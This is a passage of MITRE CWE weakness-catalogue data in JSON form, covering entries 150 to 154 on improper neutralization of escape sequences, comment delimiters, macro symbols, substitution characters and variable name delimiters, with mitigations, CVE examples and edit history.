Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Quoting Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Quoting Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Quoting Syntax","attr":{"@_Date":"2010-06-21"}}]}},"150":{"attr":{"@_ID":"150","@_Name":"Improper Neutralization of Escape, Meta, or Control Sequences","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as escape, meta, or control character sequences when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected/absent/malformed delimiter may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that escape, meta and control characters/sequences will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0542","Description":"The mail program processes special \\"~\\" escape sequence even when not in interactive mode.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0542"},{"Reference":"CVE-2000-0703","Description":"Setuid program does not filter escape sequences before calling mail program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0703"},{"Reference":"CVE-2002-0986","Description":"Mail function does not filter control characters from arguments, allowing mail message content to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0986"},{"Reference":"CVE-2003-0020","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0020"},{"Reference":"CVE-2003-0083","Description":"Multi-channel issue. Terminal escape sequences not filtered from log files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0083"},{"Reference":"CVE-2003-0021","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0021"},{"Reference":"CVE-2003-0022","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0022"},{"Reference":"CVE-2003-0023","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0023"},{"Reference":"CVE-2003-0063","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0063"},{"Reference":"CVE-2000-0476","Description":"Terminal escape sequences not filtered by terminals when displaying files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0476"},{"Reference":"CVE-2001-1556","Description":"MFV. (multi-channel). Injection of control characters into log files that allow information hiding when using raw Unix programs to read the files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1556"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Escape, Meta, or Control Character / Sequence"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS03-J","Entry_Name":"Do not log unsanitized user input"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"134"}},{"attr":{"@_CAPEC_ID":"41"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Escape, Meta, or Control Character / Sequence","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Escape, Meta, or Control Character / Sequence","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Escape, Meta, or Control Sequences","attr":{"@_Date":"2010-04-05"}}]}},"151":{"attr":{"@_ID":"151","@_Name":"Improper Neutralization of Comment Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as comment delimiters when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that comments will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0001","Description":"Mail client command execution due to improperly terminated comment in address list.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0001"},{"Reference":"CVE-2004-0162","Description":"MIE. RFC822 comment fields may be processed as other fields by clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0162"},{"Reference":"CVE-2004-1686","Description":"Well-placed comment bypasses security warning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1686"},{"Reference":"CVE-2005-1909","Description":"Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow \\">!--\\" while denying most other tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1909"},{"Reference":"CVE-2005-1969","Description":"Information hiding using a manipulation involving injection of comment code into product. Note: these vulnerabilities are likely vulnerable to more general XSS problems, although a regexp might allow \\"<!--\\" while denying most other tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1969"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Comment Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Comment Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Comment Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Comment Element","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Comment Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"152":{"attr":{"@_ID":"152","@_Name":"Improper Neutralization of Macro Symbols","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Input Validation","Description":"Developers should anticipate that macro symbols will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"},{"Reference":"CVE-2008-2018","Description":"Attacker can obtain sensitive information from a database by using a comment containing a macro, which inserts the data during expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2018"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Macro Symbol"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Macro Symbol","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Macro Symbol","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Macro Symbol","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Macro Symbols","attr":{"@_Date":"2010-04-05"}}]}},"153":{"attr":{"@_ID":"153","@_Name":"Improper Neutralization of Substitution Characters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as substitution characters when they are sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that substitution characters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Substitution Character"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Substitution Character","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Substitution Character","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Substitution Character","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Substitution Characters","attr":{"@_Date":"2010-04-05"}}]}},"154":{"attr":{"@_ID":"154","@_Name":"Improper Neutralization of Variable Name Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as variable name delimiters when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected delimiter may cause the process to take unexpected actions that result in an attack. Example: \\"$\\" for an environment variable.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that variable name delimiters will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0129","Description":"\\"%\\" variable is expanded by wildcard function into disallowed commands.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0129"},{"Reference":"CVE-2002-0770","Description":"Server trusts client to expand macros, allows macro characters to be expanded to trigger resultant information 